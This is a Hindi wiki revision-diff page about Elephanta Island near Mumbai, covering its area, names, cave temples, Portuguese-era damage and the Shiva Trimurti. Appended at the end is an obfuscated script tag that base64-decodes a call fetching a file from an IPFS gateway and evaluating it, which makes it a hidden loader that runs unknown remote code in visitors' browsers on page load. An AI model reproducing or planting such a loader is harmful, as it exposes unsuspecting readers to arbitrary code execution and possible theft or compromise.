Difference between revisions of "एलिफेंटा द्वीप"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(4 intermediate revisions by one other user not shown)
Line 1: Line 1:
{{सूचना बक्सा पर्यटन
+
[[चित्र:Elephanta-Island.jpg|thumb|250px|एलिफेंटा द्वीप]]
|चित्र=Elephanta-Island.jpg
 
|चित्र का नाम=एलिफेंटा द्वीप
 
|विवरण='एलिफेंटा द्वीप' [[अरब सागर]] में मुंबई बंदरगाह क्षेत्र में एक द्वीप है।
 
|राज्य=[[महाराष्ट्र]]
 
|केन्द्र शासित प्रदेश=
 
|ज़िला=[[मुंबई]]
 
|निर्माता=
 
|स्वामित्व=
 
|प्रबंधक=
 
|निर्माण काल=
 
|स्थापना=
 
|भौगोलिक स्थिति=
 
|मार्ग स्थिति=[[मुंबई]] शहर व [[द्वीप]] के आठ किमी पूर्व तथा [[महाराष्ट्र]] राज्य के मुख्यभूमि तट से तीन किमी पश्चिम में स्थित है।
 
|मौसम=
 
|तापमान=
 
|प्रसिद्धि=
 
|कब जाएँ=
 
|कैसे पहुँचें=
 
|हवाई अड्डा=
 
|रेलवे स्टेशन=
 
|बस अड्डा=
 
|यातायात=
 
|क्या देखें=
 
|कहाँ ठहरें=
 
|क्या खायें=
 
|क्या ख़रीदें=
 
|एस.टी.डी. कोड=
 
|ए.टी.एम=
 
|सावधानी=
 
|मानचित्र लिंक=
 
|संबंधित लेख=[[मुंबई]], [[जीजामाता उद्यान मुंबई]], [[महाराष्ट्र पर्यटन]], [[शिव|भगवान शिव]], [[द्वीप]]
 
|शीर्षक 1=
 
|पाठ 1=
 
|शीर्षक 2=
 
|पाठ 2=
 
|अन्य जानकारी= इसके भारतीय नाम 'गढ़पुरी' की उत्पत्ति द्वीप के दक्षिण में स्थित छोटे से गांव से हुई है। यहां मिली [[हाथी]] की एक विशाल प्रतिमा के कारण इसका पुर्तग़ाली नाम 'एलिफेंटा' पड़ा। यह मूर्ति आजकल मुंबई (भूतपूर्व बंबई) के [[जीजामाता उद्यान मुंबई|जीजामाता उद्यान]] (भूतपूर्व विक्टोरिया गार्डन) में रखी हुई है।
 
|बाहरी कड़ियाँ=
 
|अद्यतन=
 
}}
 
 
'''एलिफेंटा द्वीप''' ([[अंग्रेज़ी]]: ''Elephanta Island'') [[अरब सागर]] में मुंबई बंदरगाह क्षेत्र में एक द्वीप है। [[मुंबई]] शहर व [[द्वीप]] के आठ किमी पूर्व तथा [[महाराष्ट्र]] राज्य के मुख्यभूमि तट से तीन किमी पश्चिम में स्थित है।
 
'''एलिफेंटा द्वीप''' ([[अंग्रेज़ी]]: ''Elephanta Island'') [[अरब सागर]] में मुंबई बंदरगाह क्षेत्र में एक द्वीप है। [[मुंबई]] शहर व [[द्वीप]] के आठ किमी पूर्व तथा [[महाराष्ट्र]] राज्य के मुख्यभूमि तट से तीन किमी पश्चिम में स्थित है।
 
* एलिफेंटा  द्वीप का क्षेत्रफल 10-16 वर्ग किमी है, जो [[ज्वार भाटा|ज्वार-भाटा]] के साथ बदलता रहता है।  
 
* एलिफेंटा  द्वीप का क्षेत्रफल 10-16 वर्ग किमी है, जो [[ज्वार भाटा|ज्वार-भाटा]] के साथ बदलता रहता है।  
Line 50: Line 11:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{महाराष्ट्र के पर्यटन स्थल}}
 
{{महाराष्ट्र के पर्यटन स्थल}}
 
[[Category:महाराष्ट्र]][[Category:महाराष्ट्र के पर्यटन स्थल]][[Category:मुम्बई]][[Category:पर्यटन कोश]]
 
[[Category:महाराष्ट्र]][[Category:महाराष्ट्र के पर्यटन स्थल]][[Category:मुम्बई]][[Category:पर्यटन कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 13:34, 5 November 2016

thumb|250px|elipheanta dvip elipheanta dvip (aangrezi: Elephanta Island) arab sagar mean muanbee bandaragah kshetr mean ek dvip hai. muanbee shahar v dvip ke ath kimi poorv tatha maharashtr rajy ke mukhyabhoomi tat se tin kimi pashchim mean sthit hai.

  • elipheanta dvip ka kshetraphal 10-16 varg kimi hai, jo jvar-bhata ke sath badalata rahata hai.
  • isake bharatiy nam 'gadhapuri' ki utpatti dvip ke dakshin mean sthit chhote se gaanv se huee hai. yahaan mili hathi ki ek vishal pratima ke karan isaka purtagali nam 'elipheanta' p da. yah moorti ajakal muanbee (bhootapoorv banbee) ke jijamata udyan (bhootapoorv viktoriya gardan) mean rakhi huee hai.
  • elipheanta chhathi sadi ki gufaoan ke lie prasiddh hai.
  • ahamadabad ke raja dvara in gufa mandiroan ko purtagaliyoan ko sauanpane ke bad inaki upasana band ho gee aur yahaan ki pratimaoan ko purtagali sipahiyoan ne dhvast kar diya.
  • 1970 ke dashak mean un pratimaoan ko phir se sthapit kar sanrakshit kiya gaya aur tab se yah ek lokapriy paryatan sthal ban gaya hai.
  • yahaan ki sabase prasiddh pratibha bhagavan shiv ki trimoorti hai, jisaki ooanchaee lagabhag chhah mitar hai.[1]


tika tippani aur sandarbh

  1. pustak- bharat jnanakosh, khan d,1 |prakashan- ensaiklopidiya britainika (iandiya) |prishth sankhya- 262

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>